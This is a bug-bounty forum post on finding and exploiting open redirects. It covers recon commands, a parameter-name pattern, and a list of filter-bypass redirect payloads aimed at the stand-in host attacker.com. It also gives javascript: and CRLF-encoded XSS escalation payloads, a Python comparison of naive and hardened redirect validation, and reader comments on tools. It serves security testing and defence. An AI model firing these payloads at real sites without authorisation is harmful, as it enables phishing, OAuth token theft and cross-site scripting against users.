Open Redirection Guide

Identifying possible vulnerable endpoints:

  • gau or waybackurls + hakrawler + gf

    1. cat subdomains | gau | tee -a urls
    2. cat subdomains | hakrawler -depth 3 -plain | tee -a urls
    3. gf redirect urls

    using the following redirect.json pattern with gf (gf loads patterns from ~/.gf/ by default):

{
    "flags" : "-HanrE",
    "pattern" : "url=|rt=|cgi-bin/redirect.cgi|continue=|dest=|destination=|go=|out=|redir=|redirect_uri=|redirect_url=|return=|return_path=|returnTo=|rurl=|target=|view=|from_url=|load_url=|file_url=|page_url=|file_name=|page=|folder=|folder_url=|login_url=|img_url=|return_url=|return_to=|next=|redirect=|redirect_to=|logout=|checkout=|checkout_url=|goto=|next_page=|file=|load_file=|turl="
}
  • Google dorks
    site:domain.com inurl:[PARAMETER], iterating over the parameter names from the pattern above
  • Manual inspection by navigating the webapp and intercepting the requests

Confirm and exploit (check where the Location header, meta refresh or JavaScript location assignment actually sends you, not just the address bar):

* https://company.com/?redirect=http://attacker.com (no validation at all)
* https://company.com/?redirect=http://company.com.attacker.com (beats "starts with company.com" checks)
* https://company.com/?redirect=https://company.com@attacker.com (company.com is only the userinfo part; the browser goes to attacker.com)
* https://company.com/?redirect=//attacker.com (scheme-relative URL, beats "must not start with http" checks)
* https://company.com/?redirect=\/\/attacker.com (browsers treat a backslash as a slash, beats a "//" prefix filter)
* https://company.com/?redirect=http://attacker.com#company.com
* https://company.com/?redirect=http://attacker.com?company.com
* https://company.com/?redirect=http://attacker.com/company.com (these three beat "contains company.com" checks)
* https://company.com/?redirect=http://ⓐⓣⓣⓐⓒⓚⓔⓡ.ⓒⓞⓜ (IDNA mapping resolves this to attacker.com, beats blocklists on the literal string)

If you find a POST-based request vulnerable to open redirection,
try turning it into a GET request by appending the POST parameters
to the URL as query parameters, since a GET link is what a victim can actually be made to click.

Using special characters (browsers IDNA-map hostnames, so circled letters and the ideographic full stop resolve to their ASCII equivalents while a server-side string filter never sees "attacker.com"):
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ 
⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ 
⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ 
⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ 
Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ 
ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ 
⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ 。

Special characters’ source

Escalating to other vulnerabilities:

Open Redirect + Misconfigured OAuth App => OAuth Token Stealing
Open Redirect + Filtered SSRF => SSRF
Open Redirect + CRLFi => XSS
Open Redirect + javascript URI => XSS

Source

Escalate to XSS

  • https://company.com/?redirect=javascript:alert(1)
  • https://company.com/?redirect=javascript:prompt(1)

Escalate to XSS using CRLFi

  • https://company.com/?redirect=java%0d%0ascript%0d%0a:alert(0)
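The payload list above, the special-character trick and the javascript:/CRLF escalations all exploit the gap between how the server's filter reads the redirect target and how the browser reads it. The following is an added example, not code from the original post or from any of the tools mentioned: it models that gap in Python with a naive validator of the kind these payloads beat, a browser_view() that applies the browser's normalisation steps (tab/CRLF stripping, backslash-as-slash, leading-slash collapsing, userinfo removal, NFKC folding of the host), and an allowlist check built on the parsed result. The trusted host company.com and the payloads are taken from the post; the two legitimate targets and the URL-decoded CRLF payload are constructed for the comparison.

```python
import unicodedata
from urllib.parse import urlsplit

# Assumed target host, matching the guide's company.com examples.
TRUSTED_HOST = "company.com"

# Constructed test set: the guide's ?redirect= payloads (CRLF one URL-decoded),
# plus two legitimate same-site targets so both checks can be compared on them.
PAYLOADS = [
    "http://attacker.com",
    "http://company.com.attacker.com",
    "https://company.com@attacker.com",
    "//attacker.com",
    "\\/\\/attacker.com",
    "http://attacker.com#company.com",
    "http://attacker.com?company.com",
    "http://attacker.com/company.com",
    "http://ⓐⓣⓣⓐⓒⓚⓔⓡ.ⓒⓞⓜ",
    "javascript:alert(1)",
    "java\r\nscript\r\n:alert(0)",
    "/account/settings",
    "https://company.com/login",
]


def naive_is_safe(target: str) -> bool:
    """The kind of check the payloads above are built to slip past:
    accept anything that looks local or mentions our own hostname."""
    return target.startswith("/") or TRUSTED_HOST in target


def browser_view(target: str):
    """Approximate how a browser reads a Location value before following it.
    Returns (scheme, host, path); host is None when there is no authority part."""
    # Browsers drop ASCII tab and newline characters anywhere in a URL.
    t = "".join(c for c in target if c not in "\t\r\n")
    # In http(s) URLs a backslash is treated as a forward slash.
    t = t.replace("\\", "/")
    # Without a scheme, any number of leading slashes is an authority reference.
    if not urlsplit(t).scheme and t.startswith("//"):
        t = "//" + t.lstrip("/")
    parts = urlsplit(t)
    host = parts.hostname  # userinfo (company.com@) and port are stripped here
    if host is not None:
        # Hostnames are IDNA-mapped by the browser; NFKC is a stand-in that
        # folds circled letters such as ⓐ to plain 'a'.
        host = unicodedata.normalize("NFKC", host).lower()
    return parts.scheme.lower(), host, parts.path


def hardened_is_safe(target: str) -> bool:
    """Allowlist check on the parsed, browser-normalised target."""
    scheme, host, path = browser_view(target)
    if scheme not in ("", "http", "https"):
        return False  # javascript:, data:, vbscript:, ...
    if host is None:
        # No authority: accept only a scheme-less absolute path on this site.
        # A scheme with no host (http:///x) is rejected, browsers re-parse it.
        return scheme == "" and path.startswith("/")
    return host == TRUSTED_HOST


def naive_bypasses():
    """Payloads the naive check lets through that actually leave the site."""
    return [p for p in PAYLOADS if naive_is_safe(p) and not hardened_is_safe(p)]


if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"{p!r:45} naive={naive_is_safe(p)!s:5} "
              f"hardened={hardened_is_safe(p)!s:5} host={browser_view(p)[1]}")
```

Run it and compare the naive and hardened columns: six of the guide's payloads pass the naive check and resolve to attacker.com, while the hardened check accepts only the two legitimate targets. NFKC is only an approximation of the browser's IDNA (UTS #46) mapping; for a production check, encode the parsed host with Python's idna codec before comparing, and better still, map a short token to a server-side path and never redirect to a user-supplied URL at all.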

Thanks so much for pointing out hakrawler! Been looking for a fast go HTTP crawler like this!

Have you tried doing XSS analysis too with kxss? A similar loop?


I haven’t actually used it yet, but I saw this tweet the other day and I would like to try it out.


Looks really interesting.

I’d love to put together a few bug-bounty-esque hacks and automation tips for pentests so I can transfer the bug-finding power of the community into something I can fire off and get alerts for.

It would almost be epic to chain together a bunch of stuff and have it give us Discord notifications through a webhook every time it finds something!


ALSO: Do you happen to know where I can find kxss?

EDIT: Found it, in Tom's hacks repo.


Yup! tomnomnom’s tools are sick!


I don’t know Linux or web but this looks detailed nevertheless!


I think you should use dalfox instead of kxss.


Do you find it works better?

What are the key benefits / differentiators that you see?

I’ve seen it and I have actually wanted to try it for a long time! So, will do :smile: I also sourced hahwul under the special characters.


You NEED to share your findings when you get some basics up.


I didn’t try kxss, but I see it as an old thing! So no idea about the difference… but I’m sure you’ll like dalfox :blush:


fuck automation like dalfox in bbp, every beginner is running the same tools like dalfox

It is true that many people (beginners or not) do use the most famous tools and grab most of the low-hanging fruit. I personally use dalfox on endpoints where there is an indication of a possible XSS but I can’t pop it for some reason. Also, many beginners use dalfox, but on the standard recon they do. More recon = more surface for the tool to work on.
